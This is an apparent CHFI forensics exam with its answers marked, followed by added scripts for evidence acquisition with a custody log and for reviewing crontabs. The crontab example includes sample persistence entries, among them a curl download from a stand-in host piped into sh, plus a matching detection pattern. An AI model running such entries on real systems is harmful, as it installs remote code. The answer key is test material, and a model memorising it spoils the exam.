# CHFI Final Exam

1. Which of the following processes involves the technical methods and organizational measures for discovering, tracing, and inculpating individuals or groups responsible for cyberattacks?
   - [ ] Physical acquisition
   - [ ] eDiscovery
   - [X] Cyber attribution
   - [ ] Data recovery

2. Xavier, a forensic expert, was investigating a cyber incident. He started the investigation by collecting and analyzing information from a suspected device at the crime scene. He identified that the attacker hid their IP address using proxies and used a fake identity for communication. Which of the following challenges of cybercrime is demonstrated in the above scenario?
   - [ ] Limited legal understanding
   - [ ] Speed
   - [X] Anonymity
   - [ ] Evidence size and complexity

3. Which of the following terms best describes an organization's ability to optimally use digital evidence in a limited time and with minimal investigation costs?
   - [ ] Chain of custody
   - [X] Forensic readiness
   - [ ] Vulnerability assessment
   - [ ] Trial obfuscation

4. In which of the following steps of forensic readiness planning do investigators determine what currently happens to potential evidence data and the impact on the business while retrieving the information?
   - [ ] Identify the potential evidence required for an incident.
   - [X] Determine the sources of evidence.
   - [ ] Establish a policy for securely handling and storing the collected evidence.
   - [ ] Keep an incident response team ready to review the incident and preserve the evidence.

5. Which of the following indicates that an organization is not forensically prepared to maintain business continuity?
   - [ ] Minimize the required resources
   - [ ] Legally prosecute the perpetrators and claim damages
   - [ ] Quickly determine the incidents
   - [X] Inability to collect legally sound evidence

6. Williams, a forensic specialist, was investigating a system suspected to be involved in a cybercrime. Williams collected the required evidence, eliminated the root cause of the incident, and closed all the attack vectors to prevent similar incidents in the future. In which of the following phases of incident response did Williams perform the above tasks?
   - [X] Eradication
   - [ ] Preparation for incident handling and response
   - [ ] Incident triage
   - [ ] Post-incident activities

7. Which of the following terms refers to the principles used to describe the expected behavior of an investigator while handling a case?
   - [ ] System baselining
   - [X] Code of ethics
   - [ ] Lawful interception
   - [ ] Tactics, techniques, and procedures

8. Identify the type of data acquisition technique in which an investigator can collect volatile data from suspected devices only while the device is powered on.
   - [ ] Static acquisition
   - [ ] Dead acquisition
   - [X] Live acquisition
   - [ ] Non-volatile acquisition

9. Which of the following types of data is considered the most volatile according to the RFC 3227 guidelines for evidence collection and archiving?
   - [X] Registers and processor cache
   - [ ] Physical configuration
   - [ ] Archival media
   - [ ] Network topology

10. Thomas, a forensics specialist, was resolving a case related to fake email broadcasting. Thomas retrieved data from the victim system for analysis to find the source of the email server. For this purpose, Thomas extracted only ".ost" files from the system, as they can provide the required information about the incident. Identify the type of data acquisition performed by Thomas in the above scenario.
    - [ ] Sparse acquisition
    - [ ] Bit-stream disk-to-image-file
    - [ ] Bit-stream disk-to-disk
    - [X] Logical acquisition

11. Which of the following refers to a backup program an investigator should have in case hardware or software does not work or there is any failure during an acquisition?
    - [ ] Data duplication
    - [ ] Chain of custody
    - [X] Plan for contingency
    - [ ] Data analysis

12. In which of the following forensic data acquisition steps do the investigators overwrite the data by applying a sequence of zeros or ones to protect it from recovery?
    - [ ] Validating data acquisition
    - [X] Sanitize the target media
    - [ ] Acquiring volatile data
    - [ ] Planning for contingency

13. Which of the following is a program that allows bundling all files together into a single executable file via compression to bypass security software detection?
    - [ ] Dropper
    - [ ] Obfuscator
    - [ ] Payload
    - [X] Packer

14. Jude, a forensic expert, presented the final report of all his evidence findings related to a criminal case. Further, Jude provided supporting documents with details, including the source and author of the evidence and the path of transmission involved in the case, to ensure that no piece of evidence was missed. Which of the following rules of evidence is demonstrated in the above scenario?
    - [ ] Admissible
    - [ ] Understandable
    - [ ] Complete
    - [X] Authentic

15. Which of the following sections of the ACPO Principles of Digital Evidence states that no action taken by law enforcement agencies, persons employed within those agencies, or their agents should change data that may subsequently be relied upon in court?
    - [ ] Principle 2
    - [ ] Principle 4
    - [ ] Principle 3
    - [X] Principle 1

16. James, a forensic investigator, was tasked with identifying and seizing the electronic devices at a crime scene. For this purpose, James obtained documented permission from the owner of the target electronic device to perform a thorough investigation. Identify the activity performed by James during the investigation.
    - [X] Seeking consent
    - [ ] Searches without a warrant
    - [ ] Obtaining witness signatures
    - [ ] Obtaining a warrant for search and seizure

17. Which of the following is a legal document that demonstrates the progression of evidence as it travels from the original evidence location to the forensic laboratory?
    - [X] Chain of custody
    - [ ] Witness signature
    - [ ] Search warrant
    - [ ] Seeking consent

18. When handling evidence related to Internet usage, investigators must preserve the anonymity of other users. Which of the following issues does the above statement describe?
    - [X] Privacy issues
    - [ ] Environmental issues
    - [ ] Legal issues
    - [ ] Infrastructure issues

19. Identify the ISO standard that deals with electronic discovery activities such as identifying, preserving, collecting, processing, reviewing, analyzing, and producing electronically stored information (ESI).
    - [ ] ISO/IEC 27043
    - [ ] ISO/IEC 27041
    - [X] ISO/IEC 27050
    - [ ] ISO/IEC 27042

20. Which of the following components of an SSD is volatile memory, requires power to retain data, and is included to increase the read/write performance of the SSD?
    - [ ] Host interface
    - [ ] Controller
    - [ ] NAND flash memory
    - [X] DRAM

21. Which stage in the booting process of a Linux system establishes a temporary root file system using the initial RAM disk (initrd) until the real file system is mounted?
    - [ ] Bootloader stage
    - [ ] BIOS stage
    - [ ] Grand Unified Bootloader (GRUB) stage
    - [X] Kernel stage

22. In which of the following phases of the computer forensics investigation methodology must the investigator take a photograph of the computer monitor's screen and note down what was observed on the screen?
    - [X] Documenting the electronic crime scene
    - [ ] Evidence preservation
    - [ ] Data acquisition
    - [ ] Search and seizure

23. Which of the following commands allows investigators to mount an image in the APFS format and view its contents on a Linux system?
    - [X] losetup
    - [ ] wevtutil
    - [ ] fsutil
    - [ ] strings

24. Identify the dcfldd command that investigators use to compare an image file to the original medium, such as a drive or partition.
    - [X] `dcfldd if=/dev/sda vf=image.dd`
    - [ ] `dcfldd if=/dev/sda of=usbimg.dat`
    - [ ] `dcfldd if=/dev/sda split=2M of=usbimg hash=md5 hashlog=usbhash.log`
    - [ ] `dd if=/dev/sdb | split -b 650m - image_sdb`

25. Which of the following is a pre-installed command-line utility in Linux systems for scheduling commands, scripts, tasks, or jobs to execute at a specific time or at repeated intervals?
    - [ ] ListDLLs
    - [ ] nbtstat
    - [ ] ipconfig
    - [X] Cron
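Questions 12, 17 and 24 describe three steps of one acquisition procedure: sanitizing the target medium, taking a bit-stream image and verifying it against the source (what dcfldd's `vf=` option does), and recording the evidence's progression in a chain of custody. The script below is an added example and is not part of the exam or of any EC-Council material. It uses `dd` and `sha256sum` in place of dcfldd, ordinary files as stand-ins for block devices so it runs without root, and a pipe-separated custody log format of its own design in which every entry carries the hash of the previous line, so that removing or editing an earlier entry is detectable.

```shell
#!/bin/sh
# Added example (not from the CHFI exam): sanitize the target, acquire with dd,
# verify the image against the source with sha256sum, and keep a hash-chained
# chain-of-custody log. Plain files stand in for block devices; no root needed.
set -eu

hash_of() { sha256sum "$1" | cut -d' ' -f1; }

# Zero-fill the target medium before use so that nothing left on it from an
# earlier case can later be recovered and mistaken for evidence. Prints the
# hash of the wiped target so the wipe itself can be documented.
sanitize_target() {
    target="$1"; size_mb="$2"
    dd if=/dev/zero of="$target" bs=1M count="$size_mb" 2>/dev/null
    hash_of "$target"
}

# Bit-stream copy of the source into an image file. bs=512 with
# conv=noerror,sync keeps going past unreadable sectors and pads them with
# zeros, so every later sector stays at its original offset. The source is
# hashed before and the image after the copy; they match only if the image is
# a faithful copy (the comparison dcfldd performs with if=... vf=...).
acquire_and_verify() {
    src="$1"; img="$2"
    src_hash=$(hash_of "$src")
    dd if="$src" of="$img" bs=512 conv=noerror,sync 2>/dev/null
    img_hash=$(hash_of "$img")
    if [ "$src_hash" = "$img_hash" ]; then
        echo "OK $img_hash"
    else
        echo "MISMATCH source=$src_hash image=$img_hash"
        return 1
    fi
}

# Append one custody entry: time|handler|action|item hash|hash of previous line.
# The log format is assumed for this example; it is not a standard form.
custody_record() {
    log="$1"; handler="$2"; action="$3"; item_hash="$4"
    prev=$(tail -n 1 "$log" 2>/dev/null | sha256sum | cut -d' ' -f1)
    printf '%s|%s|%s|%s|%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        "$handler" "$action" "$item_hash" "$prev" >> "$log"
}

# Walk the log and confirm each entry's "previous" field equals the hash of the
# line before it (the first entry chains to the hash of empty input).
# Prints INTACT or BROKEN.
custody_verify() {
    log="$1"
    prev=$(printf '' | sha256sum | cut -d' ' -f1)
    while IFS= read -r line; do
        [ "${line##*|}" = "$prev" ] || { echo "BROKEN"; return 1; }
        prev=$(printf '%s\n' "$line" | sha256sum | cut -d' ' -f1)
    done < "$log"
    echo "INTACT"
}

# Constructed demo: a 1 MiB random "suspect drive" imaged onto a wiped target.
demo() {
    work=$(mktemp -d)
    dd if=/dev/urandom of="$work/suspect.drv" bs=512 count=2048 2>/dev/null
    sanitize_target "$work/target.img" 1 >/dev/null
    result=$(acquire_and_verify "$work/suspect.drv" "$work/target.img")
    custody_record "$work/custody.log" "investigator" "acquired suspect.drv" "${result#OK }"
    custody_record "$work/custody.log" "investigator" "handed to lab" "${result#OK }"
    status=$(custody_verify "$work/custody.log")
    rm -rf "$work"
    echo "$result; custody log $status"
}
demo
```

On a real acquisition the `src` argument is the device node (for example `/dev/sda`) and the image goes to a separate, already sanitized medium; the verification step is the one to rerun whenever the image changes hands, since the recorded hash is what the custody log vouches for.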
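Question 25 names cron as the Linux scheduler; for an investigator the same crontabs are also a routine place to look, because a scheduled entry keeps running without any further action by whoever planted it. The script below is an added example, not part of the exam: it reads crontab-format text and flags entries whose command shows indicators that warrant a closer look. The indicator list and the sample crontab are constructed for the example and are not from any real system.

```shell
#!/bin/sh
# Added example (not from the CHFI exam): review crontab-format text for
# entries that point at persistence. Indicator list and sample are constructed.
set -eu

# Constructed sample crontab: one legitimate backup job and three entries of
# the kind left behind for persistence (downloader piped into a shell, a
# binary under /dev/shm started at boot, and a base64-decoded command).
SAMPLE_CRONTAB='# m h dom mon dow command
30 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.7/x.sh | sh
@reboot /dev/shm/.cache/run
0 */6 * * * echo aGVsbG8= | base64 -d | bash'

# Indicators a first pass looks for: executables under temporary or
# world-writable paths, a downloader whose output is piped into a shell,
# inline base64 decoding, and @reboot entries (they run again after a restart).
INDICATORS='(/tmp/|/var/tmp/|/dev/shm/|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64 (-d|--decode)|^@reboot)'

# Print each non-comment, non-empty entry in FILE that matches INDICATORS.
flag_cron_entries() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -E "$INDICATORS" || true
}

# Number of flagged entries in FILE (0 when nothing matches).
count_flagged() {
    flag_cron_entries "$1" | wc -l | tr -d ' '
}

# Demo on the constructed sample. On a live system the same functions apply to
# /etc/crontab, the files under /etc/cron.d, and each user's "crontab -l" output.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_CRONTAB" > "$tmp"
echo "flagged $(count_flagged "$tmp") of $(grep -Evc '^[[:space:]]*(#|$)' "$tmp") entries:"
flag_cron_entries "$tmp"
rm -f "$tmp"
```

A match is a reason to look, not a finding on its own: the flagged lines still need the referenced paths checked, the user that owns the crontab identified, and the file timestamps compared with the incident timeline.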